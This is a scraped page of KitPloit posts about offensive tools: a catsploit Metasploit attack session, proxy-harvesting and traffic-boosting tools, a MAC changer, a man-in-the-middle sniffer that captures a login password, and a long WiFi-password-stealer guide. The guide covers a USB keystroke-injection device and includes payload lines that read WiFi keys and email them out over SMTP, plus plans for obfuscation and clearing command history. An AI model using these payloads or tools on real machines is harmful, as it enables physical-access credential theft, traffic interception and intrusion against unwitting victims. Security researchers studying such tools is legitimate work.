      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
      β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴────────────────┘

      [Users]
      ┏━━━━━━━━━━━┳━━━━━━━┓
      ┃ user name ┃ group ┃
      ┑━━━━━━━━━━━╇━━━━━━━┩
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> plan attacker h_exbiy6
      Planning attack scenario...100%
      [*] Done. 15 scenarios was planned.
      [*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
      catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
      ┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
      β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
      β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
      β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
      β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
      β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

      catsploit> scenario detail rmgrof
      ┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
      ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
      ┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
      β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
      └─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

      [Steps]
      ┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
      ┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
      β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
      β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
      β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


      catsploit> attack rmgrof
      > ~> ~
      > Metasploit Console Log
      > ~
      > ~
      [+] Attack scenario succeeded!


      catsploit> exit
      Bye.

      Disclaimer

All information and code is provided solely for educational purposes and/or for testing your own systems.

      Contact

      For any inquiry, please contact the email address as follows:

      catsploit@nk.MitsubishiElectric.co.jp



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

      By: Zion3R β€” January 6th 2024 at 11:30


      Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


      Features:

      1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
      2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
      3. Save to File: Save the list of validated proxies to a file for future use.
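
Multithreaded validation of this kind typically boils down to the following sketch (minimal and assumption-laden, not Valid8Proxy's exact code; the check endpoint and thread count are arbitrary):

from concurrent.futures import ThreadPoolExecutor

import requests

def check(proxy):
    # A proxy counts as "working" if a simple request through it succeeds quickly.
    try:
        r = requests.get(
            "https://httpbin.org/ip",  # arbitrary check endpoint
            proxies={"http": f"http://{proxy}", "https": f"http://{proxy}"},
            timeout=5,
        )
        return r.ok
    except requests.RequestException:
        return False

proxies = ["50.168.163.176:80"]  # e.g. loaded from a fetched proxy list
with ThreadPoolExecutor(max_workers=20) as pool:
    working = [p for p, ok in zip(proxies, pool.map(check, proxies)) if ok]
print(working)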

      Usage:

      1. Clone the Repository:

        git clone https://github.com/spyboy-productions/Valid8Proxy.git
      2. Navigate to the Directory:

        cd Valid8Proxy
      3. Install Dependencies:

        pip install -r requirements.txt
      4. Run the Tool:

        python Valid8Proxy.py
      5. Follow Interactive Prompts:

        • Enter the number of proxies you want to print.
        • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
      6. Save to File:

        • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
      7. Check Results:

        • Review the working proxies in the terminal with color-coded output.
        • Find the list of working proxies saved in "proxies.txt."

If you already have proxies and just want to validate them, use this:

      python Validator.py

      Follow the prompts:

      Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
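
      As a rough illustration of what such multithreaded validation looks like, here is a minimal Python sketch (hypothetical code, not Validator.py itself; the test URL, timeout and thread count are assumptions):

      import concurrent.futures
      import requests

      TEST_URL = "https://httpbin.org/ip"  # assumed test endpoint

      def check_proxy(proxy, timeout=5):
          # Route a simple GET through the proxy; any error means it is dead.
          proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
          try:
              return proxy if requests.get(TEST_URL, proxies=proxies, timeout=timeout).ok else None
          except requests.RequestException:
              return None

      def validate(proxies, workers=50):
          # Check proxies concurrently and keep only the working ones.
          with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
              return [p for p in pool.map(check_proxy, proxies) if p]

      if __name__ == "__main__":
          with open("proxy_list.txt") as f:
              candidates = [line.strip() for line in f if line.strip()]
          print("\n".join(validate(candidates)))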

      Contribution:

      Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

      Snapshots:

      If you find this GitHub repo useful, please consider giving it a star!



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

      By: Zion3R β€” January 4th 2024 at 11:30


      PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

      Features:

      • Utilizes a list of proxy IP addresses from a specified file.
      • Supports both HTTP and HTTPS proxies.
      • Allows users to input the target website URL, proxy file path, and a static port.
      • Makes HTTP requests to the specified website using each proxy.
      • Parses HTML content to extract and visit links on the webpage.
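
      As a rough sketch of that flow (illustrative only, not PhantomCrawler's actual code; the file name and target URL are assumptions), a single round of "request through a proxy, then extract links" might look like this:

      import requests
      from bs4 import BeautifulSoup
      from urllib.parse import urljoin

      def visit_through_proxy(url, proxy):
          # Send the request through the given ip:port proxy (HTTP and HTTPS).
          proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
          resp = requests.get(url, proxies=proxies, timeout=10)
          # Parse the HTML and collect absolute links found on the page.
          soup = BeautifulSoup(resp.text, "html.parser")
          return [urljoin(url, a["href"]) for a in soup.find_all("a", href=True)]

      for proxy in open("proxies.txt").read().split():
          try:
              links = visit_through_proxy("https://example.com", proxy)
              print(f"{proxy} -> {len(links)} links")
          except requests.RequestException:
              continue  # skip dead proxies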

      Usage:

      • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
      • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
      • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
      • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
      • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

      Get new proxies (with port) and add them to proxies.txt in this format: 50.168.163.176:80
      • You can get them from https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding them.

      How to Use:

      1. Clone the repository:
      git clone https://github.com/spyboy-productions/PhantomCrawler.git
      2. Install dependencies:
      pip3 install -r requirements.txt
      3. Run the script:
      python3 PhantomCrawler.py

      Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


      Snapshots:

      If you find this GitHub repo useful, please consider giving it a star!



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

      By: Zion3R β€” January 2nd 2024 at 11:30


      Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper dream scenario for some.

      Disclaimer: All content in this project is intended for security research purpose only.


      Introduction

      During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

      Setup

      After creating the pico-ducky, you only need to copy the modified payload to the RPi Pico (adjusted with your SMTP details for the Windows exploit, and/or with the Linux password and USB drive name for the Linux exploit).

      Prerequisites

      • Physical access to the victim's computer.

      • The victim's computer must be unlocked.

      • The victim's computer must have internet access in order to send the stolen data via SMTP (exfiltration over the network medium).

      • Knowledge of the victim's password, for the Linux exploit.

      Requirements - What you'll need


      • Raspberry Pi Pico (RPi Pico)
      • Micro USB to USB Cable
      • Jumper Wire (optional)
      • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
      • USB flash drive (for the exploit over physical medium only)


      Note:

      • It is possible to build this tool using a Rubber Ducky, but keep in mind that an RPi Pico costs about $4.00 while the Rubber Ducky costs $80.00.

      • However, while pico-ducky is a good and budget-friendly solution, the Rubber Ducky does offer advantages such as stealthiness and support for the latest DuckyScript version.

      • In order to use DuckyScript to write the payload on your RPi Pico, you first need to convert it to a pico-ducky. Follow these simple steps to create pico-ducky.

      Keystroke injection tool

      A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like the Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy the payload with ease.

      Keystroke injection

      The payload uses the STRING command to process keystrokes for injection. STRING accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. ENTER and SPACE simulate presses of the corresponding keys.

      Delays

      We use the DELAY command to temporarily pause execution of the payload. This is useful when the payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is first connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input. For HIDs the setup time is very short, usually a fraction of a second, because the drivers are built in. However, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
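
      To make STRING and DELAY concrete, here is a minimal illustrative DuckyScript fragment (not part of this project's payloads) that waits for the host to register the device, opens the Windows Run dialog and launches PowerShell:

      REM Illustrative fragment: wait for the HID to be ready, then type.
      DELAY 1000
      GUI r
      DELAY 500
      STRING powershell
      ENTER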

      Exfiltration

      Data exfiltration is the unauthorized transfer of data from a computer or device. Once the data is collected, an adversary can package it with encryption or compression to avoid detection while sending it over the network. The two most common ways of exfiltrating data are:

      • Exfiltration over the network medium.
        • This approach was used for the Windows exploit. The whole payload can be seen here.

      • Exfiltration over a physical medium.
        • This approach was used for the Linux exploit. The whole payload can be seen here.

      Windows exploit

      In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

      Sending stolen data over email

      Once passwords have been exported to the .txt file, the payload will send the data to the appointed email address using Yahoo SMTP. For more detailed instructions, visit the following link. The payload template also needs to be updated with your SMTP information: you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you can also update the body and the subject of the email.

      STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

       Note:

      • After sending data over the email, the .txt file is deleted.

      • You can also use an SMTP server from another email provider, but be mindful of the SMTP server address and port number you write into the payload.

      • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

      Linux exploit

      In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

      Storing stolen data to USB flash drive

      Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

      STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

      STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

      In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

      STRING echo PASSWORD | sudo -S echo

      STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

      Bash script

      In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

      echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

      where PASSWORD is your account's password and USBSTICK is the name for your USB device.

      Quick overview of the payload

      NetworkManager is based on the concept of connection profiles and uses plugins for reading/writing them. The keyfile plugin uses an .ini-style keyfile format to store network configuration profiles; it supports all the connection types and capabilities that NetworkManager has, and its files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For filtering, a positive lookbehind assertion ((?<=keyword)) is used: the lookbehind matches at a position right after the keyword without making the keyword itself part of the match, so the regex (?<=keyword).* matches any text that follows the keyword. This allows the payload to capture the values after the ssid= and psk= (pre-shared key) keys.
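
      As a quick demonstration of the lookbehind (using Python's re here instead of grep, with a made-up sample keyfile):

      import re

      keyfile = """[wifi]
      ssid=HomeNetwork

      [wifi-security]
      psk=supersecret
      """

      # (?<=ssid=) asserts a position right after "ssid=" without
      # consuming it, so .* captures only the value.
      print(re.findall(r"(?<=ssid=).*", keyfile))  # ['HomeNetwork']
      print(re.findall(r"(?<=psk=).*", keyfile))   # ['supersecret']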

      For more information about NetworkManager, here are some useful links:

      Exfiltrated data formatting

      Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

      Wireless_Network_Name   Password
      ---------------------   --------
      WLAN1                   pass1
      WLAN2                   pass2
      WLAN3                   pass3

      USB Mass Storage Device Problem

      One of the advantages of the Rubber Ducky over the RPi Pico is that it doesn't show up as a USB mass storage device once plugged in: all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.
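
      On CircuitPython boards such a check typically lives in boot.py; the following is only a sketch of the idea (assuming the standard digitalio/storage APIs), so consult the linked guide for the exact pico-ducky code:

      # boot.py -- runs before USB is enumerated
      import board
      import digitalio
      import storage

      # Read GP15 with an internal pull-up: grounded means "stealth mode".
      pin = digitalio.DigitalInOut(board.GP15)
      pin.switch_to_input(pull=digitalio.Pull.UP)

      if not pin.value:
          # Jumper between GND and GP15 present: hide the mass storage
          # device so the Pico enumerates as a keyboard only.
          storage.disable_usb_drive()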

      πŸ’‘ Tip:

      • Upload your payload to RPi Pico before you connect the pins.
      • Don't solder the pins because you will probably want to change/update the payload at some point.

      Payload Writer

      When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. To run the script successfully you need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below is an example of how to run the writer script when creating a Windows payload.

      python3 writer.py windows payload1.dd

      Limitations/Drawbacks

      • This pico-ducky currently works only on Windows OS.

      • This attack requires physical access to an unlocked device in order to be successfully deployed.

      • The Linux exploit is far less likely to be successful: to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

      • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

      • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

      • The pico-ducky device isn't really stealthy; quite the opposite, it's rather bulky, especially if you solder the pins.

      • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

      • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

      • If the computer has a non-English environment set, this exploit won't be successful.

      • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

      To-Do List

      • Fix Caps Lock bug.
      • Fix non-English Environment bug.
      • Obfuscate the command prompt.
      • Implement exfiltration over a physical medium.
      • Create a payload for Linux.
      • Encode/Encrypt exfiltrated data before sending it over email.
      • Implement indicator of successfully completed exploit.
      • Implement command history clean-up for Linux exploit.
      • Enhance the Linux exploit in order to avoid usage of sudo.


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      MacMaster - MAC Address Changer

      By: Zion3R β€” December 18th 2023 at 11:30


      MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

      Features

      • Custom MAC Address: Set a specific MAC address to your network interface.
      • Random MAC Address: Generate and set a random MAC address.
      • Reset to Original: Reset the MAC address to its original hardware value.
      • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
      • Version Information: Easily check the version of MacMaster you are using.

      Installation

      MacMaster requires Python 3.6 or later.

      1. Clone the repository:
        $ git clone https://github.com/HalilDeniz/MacMaster.git
      2. Navigate to the cloned directory:
        $ cd MacMaster
      3. Install the package:
        $ python setup.py install

      Usage

      $ macmaster --help         
      usage: macmaster [-h] [--interface INTERFACE] [--version]
      [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

      MacMaster: Mac Address Changer

      options:
      -h, --help show this help message and exit
      --interface INTERFACE, -i INTERFACE
      Network interface to change MAC address
      --version, -V Show the version of the program
      --random, -r Set a random MAC address
      --newmac NEWMAC, -nm NEWMAC
      Set a specific MAC address
      --customoui CUSTOMOUI, -co CUSTOMOUI
      Set a custom OUI for the MAC address
      --reset, -rs Reset MAC address to the original value

      Arguments

      • --interface, -i: Specify the network interface.
      • --random, -r: Set a random MAC address.
      • --newmac, -nm: Set a specific MAC address.
      • --customoui, -co: Set a custom OUI for the MAC address.
      • --reset, -rs: Reset MAC address to the original value.
      • --version, -V: Show the version of the program.
      Examples

      1. Set a specific MAC address:
        $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
      2. Set a random MAC address:
        $ macmaster.py -i eth0 -r
      3. Reset MAC address to its original value:
        $ macmaster.py -i eth0 -rs
      4. Set a custom OUI:
        $ macmaster.py -i eth0 -co 08:00:27
      5. Show program version:
        $ macmaster.py -V

      Replace eth0 with your desired network interface.
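
      For reference, generating a random MAC address, optionally under a fixed OUI, is straightforward; here is a Python sketch of the idea (illustrative only, not MacMaster's actual implementation):

      import random

      def random_mac(oui=None):
          # Keep a caller-supplied OUI (e.g. "08:00:27") for the first three
          # octets; otherwise generate a locally administered unicast octet.
          if oui:
              head = oui.lower().split(":")
          else:
              first = (random.randint(0, 255) & 0b11111100) | 0b00000010
              head = [f"{first:02x}"] + [f"{random.randint(0, 255):02x}" for _ in range(2)]
          tail = [f"{random.randint(0, 255):02x}" for _ in range(3)]
          return ":".join(head + tail)

      print(random_mac())            # fully random, locally administered
      print(random_mac("08:00:27"))  # random address under a fixed OUI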

      Note

      You must run this script as root or with sudo for it to work properly, because changing a MAC address requires root privileges.

      Contributing

      Contributions are welcome! To contribute to MacMaster, follow these steps:

      1. Fork the repository.
      2. Create a new branch for your feature or bug fix.
      3. Make your changes and commit them.
      4. Push your changes to your forked repository.
      5. Open a pull request in the main repository.

      Contact

      For any inquiries or further information, you can reach me through the following channels:




      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

      By: Zion3R β€” December 15th 2023 at 11:30


      PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


      Features

      • Packet Capture: Capture and analyze network packets in real-time.
      • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
      • Raw Payload Viewing: View raw payload data for deeper investigation.
      • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

      Installation

      git clone https://github.com/HalilDeniz/PacketSpy.git

      Requirements

      PacketSpy requires the following dependencies to be installed:

      pip install -r requirements.txt

      Getting Started

      To get started with PacketSpy, use the following command-line options:

      root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
      usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

      options:
      -h, --help show this help message and exit
      -t TARGET_IP, --target TARGET_IP
      Target IP address
      -g GATEWAY_IP, --gateway GATEWAY_IP
      Gateway IP address
      -i INTERFACE, --interface INTERFACE
      Interface name
      -tf TARGET_FIND, --targetfind TARGET_FIND
      Target IP range to find
      --ip-forward, -if Enable packet forwarding
      -m METHOD, --method METHOD
      Limit sniffing to a specific HTTP method

      Examples

      1. Device Detection
      root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

      Device discovery
      **************************************
      Ip Address      Mac Address
      **************************************
      10.0.2.1        52:54:00:12:35:00
      10.0.2.2        52:54:00:12:35:00
      10.0.2.3        08:00:27:78:66:95
      10.0.2.11       08:00:27:65:96:cd
      10.0.2.12       08:00:27:2f:64:fe

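      Device detection of this kind is usually an ARP sweep of the target range; a minimal Scapy sketch of the idea (illustrative, not PacketSpy's actual code) looks like this:

      from scapy.all import ARP, Ether, srp

      # Broadcast who-has ARP requests for every address in the range and
      # collect the replies (requires root).
      answered, _ = srp(
          Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="10.0.2.0/24"),
          timeout=2, iface="eth0", verbose=False,
      )
      for _, reply in answered:
          print(reply.psrc, reply.hwsrc)
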
      2. Man-in-the-Middle Sniffing
      root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
      ******************* started sniff *******************

      HTTP Request:
      Method: b'POST'
      Host: b'testphp.vulnweb.com'
      Path: b'/userinfo.php'
      Source IP: 10.0.2.20
      Source MAC: 08:00:27:04:e8:82
      Protocol: HTTP
      User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

      Raw Payload:
      b'uname=admin&pass=mysecretpassword'

      HTTP Response:
      Status Code: b'302'
      Content Type: b'text/html; charset=UTF-8'
      --------------------------------------------------
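
      The HTTP inspection shown above boils down to sniffing TCP port 80 traffic and decoding the raw payloads; here is a stripped-down Scapy sketch of the idea (illustrative, not PacketSpy's actual code):

      from scapy.all import Raw, sniff

      def show_http(pkt):
          # Print the request/response line and headers of plain-HTTP packets.
          data = bytes(pkt[Raw].load)
          if data.startswith((b"GET", b"POST", b"HTTP/")):
              print(data.split(b"\r\n\r\n")[0].decode(errors="replace"))
              print("-" * 50)

      sniff(iface="eth0", filter="tcp port 80", store=False,
            lfilter=lambda p: p.haslayer(Raw), prn=show_http)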

      FootNote

      HTTPS support is still a work in progress.

      Contributing

      Contributions are welcome! To contribute to PacketSpy, follow these steps:

      1. Fork the repository.
      2. Create a new branch for your feature or bug fix.
      3. Make your changes and commit them.
      4. Push your changes to your forked repository.
      5. Open a pull request in the main repository.

      Contact

      If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

      License

      PacketSpy is released under the MIT License. See LICENSE for more information.



      ❌